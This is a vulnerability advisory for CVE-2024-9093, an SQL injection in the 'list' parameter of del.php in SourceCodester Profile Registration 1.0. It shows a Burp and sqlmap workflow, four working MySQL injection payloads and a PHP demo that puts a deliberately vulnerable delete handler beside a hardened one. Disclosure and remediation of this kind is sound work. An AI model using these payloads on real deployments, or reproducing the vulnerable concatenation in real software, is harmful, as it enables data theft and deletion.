SQL injection vulnerability discovered in SourceCodester Profile Registration without Reload/Refresh 1.0 (del.php)

CVE-2024-9093

A vulnerability classified as critical has been found in SourceCodester Profile Registration without Reload/Refresh 1.0. It affects the file del.php, in the component that handles GET parameters. Manipulation of the GET argument `list` with attacker-controlled input leads to SQL injection. The issue is classified as CWE-89: the product builds all or part of an SQL command from externally influenced input received from an upstream component, but does not neutralize (or incorrectly neutralizes) special elements that can change the intended SQL command when it is sent to the downstream database. Successful exploitation impacts confidentiality, integrity, and availability.

Affected Project: Profile Registration without Reload/Refresh 1.0

Official Website: https://www.sourcecodester.com/php/17587/profile-registration-without-reloadrefresh-using-ajax-php-and-mysql-source-code.html

Version: 1.0

Related Code file: del.php

Injection parameter: the GET parameter 'list' is vulnerable.

Demonstration

Below is the Profile Registration without Reload/Refresh 1.0 index page:

[screenshot: index]

Below is the admin page. We can see that it has a delete feature:

[screenshot: admin-php]

Let's try deleting one of the entries:

[screenshot from 2024-09-22 15-17-22]

We intercept the delete request (del.php) with Burp Suite:

[screenshot from 2024-09-22 15-18-26]

After saving the intercepted request to a text file (del.req), we run sqlmap against it: sqlmap -r del.req --batch

[image: sqlmap output]

sqlmap identifies the GET parameter 'list' as injectable. Below are the payloads it used:

Parameter: list (GET)
Type: boolean-based blind
Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: list=1' AND EXTRACTVALUE(6463,CASE WHEN (6463=6463) THEN 6463 ELSE 0x3A END)-- jUPW

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: list=1' AND GTID_SUBSET(CONCAT(0x7176786271,(SELECT (ELT(3483=3483,1))),0x71627a6271),3483)-- xwxz

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: list=1';SELECT SLEEP(5)#

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: list=1' AND (SELECT 7323 FROM (SELECT(SLEEP(5)))ELsa)-- jKqa
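Every payload above starts with `list=1'`, i.e. it breaks out of a single-quoted string, which is what happens when the parameter is interpolated straight into the SQL text (the CWE-89 pattern described at the top of this advisory). The following is an added example and is not the project's del.php, whose source is not reproduced on this page: a reconstructed vulnerable DELETE handler next to a hardened one that validates the id as an integer and binds it as a parameter. It uses an in-memory SQLite database through PDO so it runs stand-alone with the PHP CLI; the table name `profiles`, the column `id`, the sample rows and the function names are assumptions made for the example.

```php
<?php
// Added example, not code from the SourceCodester project. The table, rows and
// function names are assumptions; SQLite (via PDO) stands in for MySQL so the
// script runs offline. The injection mechanics are the same on MySQL.

function setupDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec("CREATE TABLE profiles (id INTEGER PRIMARY KEY, name TEXT NOT NULL)");
    // constructed sample data
    $db->exec("INSERT INTO profiles (id, name) VALUES (1, 'alice'), (2, 'bob'), (3, 'carol')");
    return $db;
}

// Assumed vulnerable pattern, consistent with the single-quote break-out in the
// sqlmap payloads: $_GET['list'] is concatenated into the SQL string unchanged.
// Returns the number of deleted rows.
function deleteVulnerable(PDO $db, string $list): int {
    $sql = "DELETE FROM profiles WHERE id='" . $list . "'";
    return $db->exec($sql);
}

// Hardened version: the id must be a positive integer, and it is passed to the
// database as a bound parameter rather than as part of the SQL text.
function deleteSafe(PDO $db, string $list): int {
    $id = filter_var($list, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('list must be a positive integer id');
    }
    $stmt = $db->prepare("DELETE FROM profiles WHERE id = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

function rowCount(PDO $db): int {
    return (int) $db->query("SELECT COUNT(*) FROM profiles")->fetchColumn();
}

// --- demonstration ---------------------------------------------------------
$injected = "1' OR '1'='1";   // constructed payload: closes the quote, makes WHERE always true

$db = setupDb();
printf("vulnerable, benign input '1':        deleted %d row(s), %d left\n",
       deleteVulnerable($db, "1"), rowCount($db));            // 1 deleted, 2 left

$db = setupDb();
printf("vulnerable, injected input:           deleted %d row(s), %d left\n",
       deleteVulnerable($db, $injected), rowCount($db));      // 3 deleted, 0 left

$db = setupDb();
printf("hardened, benign input '1':          deleted %d row(s), %d left\n",
       deleteSafe($db, "1"), rowCount($db));                  // 1 deleted, 2 left

$db = setupDb();
try {
    deleteSafe($db, $injected);
} catch (InvalidArgumentException $e) {
    printf("hardened, injected input:             rejected (%s), %d left\n",
           $e->getMessage(), rowCount($db));                  // rejected, 3 left
}
```

Run it with `php del_example.php` (any filename will do). On a MySQL deployment the same fix applies with mysqli prepared statements or PDO with `PDO::ATTR_EMULATE_PREPARES` set to false; with native (non-emulated) MySQL prepares the server also refuses to run a second statement appended after a semicolon, which is what the stacked-queries finding from sqlmap relies on. Independently of the injection, del.php should only be reachable by an authenticated administrator, which this example does not cover.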